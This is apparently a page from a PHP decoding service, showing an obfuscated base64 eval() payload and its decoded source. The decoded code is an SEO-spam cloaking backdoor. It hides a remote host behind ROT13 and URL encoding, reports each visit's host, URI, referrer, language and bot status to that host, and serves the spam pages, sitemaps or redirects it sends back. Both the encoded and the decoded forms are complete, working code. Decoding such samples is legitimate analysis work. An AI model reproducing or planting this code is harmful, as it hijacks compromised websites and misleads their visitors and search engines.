Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?=eval("?>".base64_decode(" PD9waHAKQHNldF90aW1lX2xpbWl0KDM2MDApOwpAaWdub3JlX3VzZX..
Decoded Output download
None?>b'<?php
@set_time_limit(3600);
@ignore_user_abort(1);
$xmlname = \'%6A%6B%77%68%71%74%72%6B%63%2E%70%66%72%65%69%6E%70%71%6A%2E%6B%6C%6D\';
$http_web = \'http\';
if (is_https()) {
$http = \'https\';
} else {
$http = \'http\';
}
$duri_tmp = drequest_uri();
if ($duri_tmp == \'\'){
$duri_tmp = \'/\';
}
$duri = base64_encode($duri_tmp);
function drequest_uri()
{
if (isset($_SERVER[\'REQUEST_URI\'])) {
$duri = $_SERVER[\'REQUEST_URI\'];
} else {
if (isset($_SERVER[\'argv\'])) {
$duri = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'argv\'][0];
} else {
$duri = $_SERVER[\'PHP_SELF\'] . \'?\' . $_SERVER[\'QUERY_STRING\'];
}
}
return $duri;
}
$goweb = str_rot13(urldecode($xmlname));
function is_https()
{
if (isset($_SERVER[\'HTTPS\']) && strtolower($_SERVER[\'HTTPS\']) !== \'off\') {
return true;
} elseif (isset($_SERVER[\'HTTP_X_FORWARDED_PROTO\']) && $_SERVER[\'HTTP_X_FORWARDED_PROTO\'] === \'https\') {
return true;
} elseif (isset($_SERVER[\'HTTP_FRONT_END_HTTPS\']) && strtolower($_SERVER[\'HTTP_FRONT_END_HTTPS\']) !== \'off\') {
return true;
}
return false;
}
$host = $_SERVER[\'HTTP_HOST\'];
$lang = @$_SERVER["HTTP_ACCEPT_LANGUAGE"];
$lang = base64_encode($lang);
$urlshang = \'\';
if (isset($_SERVER[\'HTTP_REFERER\'])) {
$urlshang = $_SERVER[\'HTTP_REFERER\'];
$urlshang = base64_encode($urlshang);
}
$web = $http_web . \'://\' . $goweb . \'/indexnew.php?web=\' . $host . \'&zz=\' . disbot() . \'&uri=\' . $duri . \'&urlshang=\' . $urlshang . \'&http=\' . $http . \'&lang=\' . $lang;
$html_content = trim(doutdo($web));
if (!strstr($html_content, \'nobotuseragent\')) {
if (strstr($html_content, \'okhtmlgetcontent\')) {
@header("Content-type: text/html; charset=utf-8");
$html_content = str_replace("okhtmlgetcontent", \'\', $html_content);
echo $html_content;
exit();
}else if(strstr($html_content, \'okxmlgetcontent\')){
$html_content = str_replace("okxmlgetcontent", \'\', $html_content);
@header("Content-type: text/xml");
echo $html_content;
exit();
}else if(strstr($html_content, \'pingxmlgetcontent\')){
$html_content = str_replace("pingxmlgetcontent", \'\', $html_content);
@header("Content-type: text/html; charset=utf-8");
echo ping_sitemap($html_content);
exit();
}else if (strstr($html_content, \'getcontent500page\')) {
@header(\'HTTP/1.1 500 Internal Server Error\');
exit();
}else if (strstr($html_content, \'getcontent404page\')) {
@header(\'HTTP/1.1 404 Not Found\');
exit();
}else if (strstr($html_content, \'getcontent301page\')) {
@header(\'HTTP/1.1 301 Moved Permanently\');
$html_content = str_replace("getcontent301page", \'\', $html_content);
header(\'Location: \' . $html_content);
exit();
}
}
function ping_sitemap($url){
$url_arr = explode("
", trim($url));
$return_str = \'\';
foreach($url_arr as $pingUrl){
$pingRes = doutdo($pingUrl);
$ok = (strpos($pingRes, \'Sitemap Notification Received\') !== false) ? \'pingok\' : \'error\';
$return_str .= $pingUrl . \'-- \' . $ok . \'<br>\';
}
return $return_str;
}
function disbot()
{
$uAgent = strtolower($_SERVER[\'HTTP_USER_AGENT\']);
if (stristr($uAgent, \'googlebot\') || stristr($uAgent, \'bing\') || stristr($uAgent, \'yahoo\') || stristr($uAgent, \'google\') || stristr($uAgent, \'Googlebot\') || stristr($uAgent, \'googlebot\')) {
return true;
} else {
return false;
}
}
function doutdo($url)
{
$file_contents= \'\';
if (!$file_contents) {
$file_contents = @file_get_contents($url);
}
return $file_contents;
}/* blog R1-A119 */ ?>'
Did this file decode correctly?
Original Code
<?=eval("?>".base64_decode("
PD9waHAKQHNldF90aW1lX2xpbWl0KDM2MDApOwpAaWdub3JlX3VzZXJfYWJvcnQoMSk7CiR4bWxuYW1lID0gJyU2QSU2QiU3NyU2OCU3MSU3NCU3MiU2QiU2MyUyRSU3MCU2NiU3MiU2NSU2OSU2RSU3MCU3MSU2QSUyRSU2QiU2QyU2RCc7CgoKCgokaHR0cF93ZWIgPSAnaHR0cCc7CmlmIChpc19odHRwcygpKSB7CiAgICAkaHR0cCA9ICdodHRwcyc7Cn0gZWxzZSB7CiAgICAkaHR0cCA9ICdodHRwJzsKfQokZHVyaV90bXAgPSBkcmVxdWVzdF91cmkoKTsKaWYgKCRkdXJpX3RtcCA9PSAnJyl7CiAgICAkZHVyaV90bXAgPSAnLyc7Cn0KJGR1cmkgPSBiYXNlNjRfZW5jb2RlKCRkdXJpX3RtcCk7CmZ1bmN0aW9uIGRyZXF1ZXN0X3VyaSgpCnsKICAgIGlmIChpc3NldCgkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSkpIHsKICAgICAgICAkZHVyaSA9ICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwogICAgfSBlbHNlIHsKICAgICAgICBpZiAoaXNzZXQoJF9TRVJWRVJbJ2FyZ3YnXSkpIHsKICAgICAgICAgICAgJGR1cmkgPSAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuICc/JyAuICRfU0VSVkVSWydhcmd2J11bMF07CiAgICAgICAgfSBlbHNlIHsKICAgICAgICAgICAgJGR1cmkgPSAkX1NFUlZFUlsnUEhQX1NFTEYnXSAuICc/JyAuICRfU0VSVkVSWydRVUVSWV9TVFJJTkcnXTsKICAgICAgICB9CiAgICB9CiAgICByZXR1cm4gJGR1cmk7Cn0KCiRnb3dlYiA9IHN0cl9yb3QxMyh1cmxkZWNvZGUoJHhtbG5hbWUpKTsKZnVuY3Rpb24gaXNfaHR0cHMoKQp7CiAgICBpZiAoaXNzZXQoJF9TRVJWRVJbJ0hUVFBTJ10pICYmIHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBTJ10pICE9PSAnb2ZmJykgewogICAgICAgIHJldHVybiB0cnVlOwogICAgfSBlbHNlaWYgKGlzc2V0KCRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEX1BST1RPJ10pICYmICRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEX1BST1RPJ10gPT09ICdodHRwcycpIHsKICAgICAgICByZXR1cm4gdHJ1ZTsKICAgIH0gZWxzZWlmIChpc3NldCgkX1NFUlZFUlsnSFRUUF9GUk9OVF9FTkRfSFRUUFMnXSkgJiYgc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9GUk9OVF9FTkRfSFRUUFMnXSkgIT09ICdvZmYnKSB7CiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9CiAgICByZXR1cm4gZmFsc2U7Cn0KCiRob3N0ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOwokbGFuZyA9IEAkX1NFUlZFUlsiSFRUUF9BQ0NFUFRfTEFOR1VBR0UiXTsKJGxhbmcgPSBiYXNlNjRfZW5jb2RlKCRsYW5nKTsKJHVybHNoYW5nID0gJyc7CmlmIChpc3NldCgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pKSB7CiAgICAkdXJsc2hhbmcgPSAkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiAgICAkdXJsc2hhbmcgPSBiYXNlNjRfZW5jb2RlKCR1cmxzaGFuZyk7Cn0KCiR3ZWIgPSAkaHR0cF93ZWIgLiAnOi8vJyAuICRnb3dlYiAuICcvaW5kZXhuZXcucGhwP3dlYj0nIC4gJGhvc3QgLiAnJnp6PScgLiBkaXNib3QoKSAuICcmdXJpPScgLiAkZHVyaSAuICcmdXJsc2hhbmc9JyAuICR1cmxzaGFuZyAuICcmaHR0cD0nIC4gJGh0dHAgLiAnJmxhbmc9JyAuICRsYW5nOwokaHRtbF9jb250ZW50ID0gdHJpbShkb3V0ZG8oJHdlYikpOwppZiAoIXN0cnN0cigkaHRtbF9jb250ZW50LCAnbm9ib3R1c2VyYWdlbnQnKSkgewogICAgaWYgKHN0cnN0cigkaHRtbF9jb250ZW50LCAnb2todG1sZ2V0Y29udGVudCcpKSB7CiAgICAgICAgQGhlYWRlcigiQ29udGVudC10eXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiKTsKICAgICAgICAkaHRtbF9jb250ZW50ID0gc3RyX3JlcGxhY2UoIm9raHRtbGdldGNvbnRlbnQiLCAnJywgJGh0bWxfY29udGVudCk7CiAgICAgICAgZWNobyAkaHRtbF9jb250ZW50OwogICAgICAgIGV4aXQoKTsKICAgIH1lbHNlIGlmKHN0cnN0cigkaHRtbF9jb250ZW50LCAnb2t4bWxnZXRjb250ZW50JykpewogICAgICAgICRodG1sX2NvbnRlbnQgPSBzdHJfcmVwbGFjZSgib2t4bWxnZXRjb250ZW50IiwgJycsICRodG1sX2NvbnRlbnQpOwogICAgICAgIEBoZWFkZXIoIkNvbnRlbnQtdHlwZTogdGV4dC94bWwiKTsKICAgICAgICBlY2hvICRodG1sX2NvbnRlbnQ7CiAgICAgICAgZXhpdCgpOwogICAgfWVsc2UgaWYoc3Ryc3RyKCRodG1sX2NvbnRlbnQsICdwaW5neG1sZ2V0Y29udGVudCcpKXsKICAgICAgICAkaHRtbF9jb250ZW50ID0gc3RyX3JlcGxhY2UoInBpbmd4bWxnZXRjb250ZW50IiwgJycsICRodG1sX2NvbnRlbnQpOwogICAgICAgIEBoZWFkZXIoIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Iik7CiAgICAgICAgZWNobyBwaW5nX3NpdGVtYXAoJGh0bWxfY29udGVudCk7CiAgICAgICAgZXhpdCgpOwogICAgfWVsc2UgaWYgKHN0cnN0cigkaHRtbF9jb250ZW50LCAnZ2V0Y29udGVudDUwMHBhZ2UnKSkgewogICAgICAgIEBoZWFkZXIoJ0hUVFAvMS4xIDUwMCBJbnRlcm5hbCBTZXJ2ZXIgRXJyb3InKTsKICAgICAgICBleGl0KCk7CiAgICB9ZWxzZSBpZiAoc3Ryc3RyKCRodG1sX2NvbnRlbnQsICdnZXRjb250ZW50NDA0cGFnZScpKSB7CiAgICAgICAgQGhlYWRlcignSFRUUC8xLjEgNDA0IE5vdCBGb3VuZCcpOwogICAgICAgIGV4aXQoKTsKICAgIH1lbHNlIGlmIChzdHJzdHIoJGh0bWxfY29udGVudCwgJ2dldGNvbnRlbnQzMDFwYWdlJykpIHsKICAgICAgICBAaGVhZGVyKCdIVFRQLzEuMSAzMDEgTW92ZWQgUGVybWFuZW50bHknKTsKICAgICAgICAkaHRtbF9jb250ZW50ID0gc3RyX3JlcGxhY2UoImdldGNvbnRlbnQzMDFwYWdlIiwgJycsICRodG1sX2NvbnRlbnQpOwogICAgICAgIGhlYWRlcignTG9jYXRpb246ICcgLiAkaHRtbF9jb250ZW50KTsKICAgICAgICBleGl0KCk7CiAgICB9Cn0KZnVuY3Rpb24gcGluZ19zaXRlbWFwKCR1cmwpewogICAgJHVybF9hcnIgPSBleHBsb2RlKCJcclxuIiwgdHJpbSgkdXJsKSk7CiAgICAkcmV0dXJuX3N0ciA9ICcnOwogICAgZm9yZWFjaCgkdXJsX2FyciBhcyAkcGluZ1VybCl7CiAgICAgICAgJHBpbmdSZXMgPSBkb3V0ZG8oJHBpbmdVcmwpOwogICAgICAgICRvayA9IChzdHJwb3MoJHBpbmdSZXMsICdTaXRlbWFwIE5vdGlmaWNhdGlvbiBSZWNlaXZlZCcpICE9PSBmYWxzZSkgPyAncGluZ29rJyA6ICdlcnJvcic7CiAgICAgICAgJHJldHVybl9zdHIgLj0gJHBpbmdVcmwgLiAnLS0gJyAuICRvayAuICc8YnI+JzsKICAgIH0KICAgIHJldHVybiAkcmV0dXJuX3N0cjsKfQpmdW5jdGlvbiBkaXNib3QoKQp7CiAgICAkdUFnZW50ID0gc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pOwogICAgaWYgKHN0cmlzdHIoJHVBZ2VudCwgJ2dvb2dsZWJvdCcpIHx8IHN0cmlzdHIoJHVBZ2VudCwgJ2JpbmcnKSB8fCBzdHJpc3RyKCR1QWdlbnQsICd5YWhvbycpIHx8IHN0cmlzdHIoJHVBZ2VudCwgJ2dvb2dsZScpIHx8IHN0cmlzdHIoJHVBZ2VudCwgJ0dvb2dsZWJvdCcpIHx8IHN0cmlzdHIoJHVBZ2VudCwgJ2dvb2dsZWJvdCcpKSB7CiAgICAgICAgcmV0dXJuIHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIHJldHVybiBmYWxzZTsKICAgIH0KfQpmdW5jdGlvbiBkb3V0ZG8oJHVybCkKewogICAgJGZpbGVfY29udGVudHM9ICcnOwoKICAgIGlmICghJGZpbGVfY29udGVudHMpIHsKICAgICAgICAkZmlsZV9jb250ZW50cyA9IEBmaWxlX2dldF9jb250ZW50cygkdXJsKTsKICAgIH0KICAgIHJldHVybiAkZmlsZV9jb250ZW50czsKfS8qIGJsb2cgUjEtQTExOSAqLyA/Pg==
"));?>
<?php
Function Calls
base64_decode | 1 |
Stats
MD5 | d8865cea36c4360122d17cab5486efba |
Eval Count | 1 |
Decode Time | 62 ms |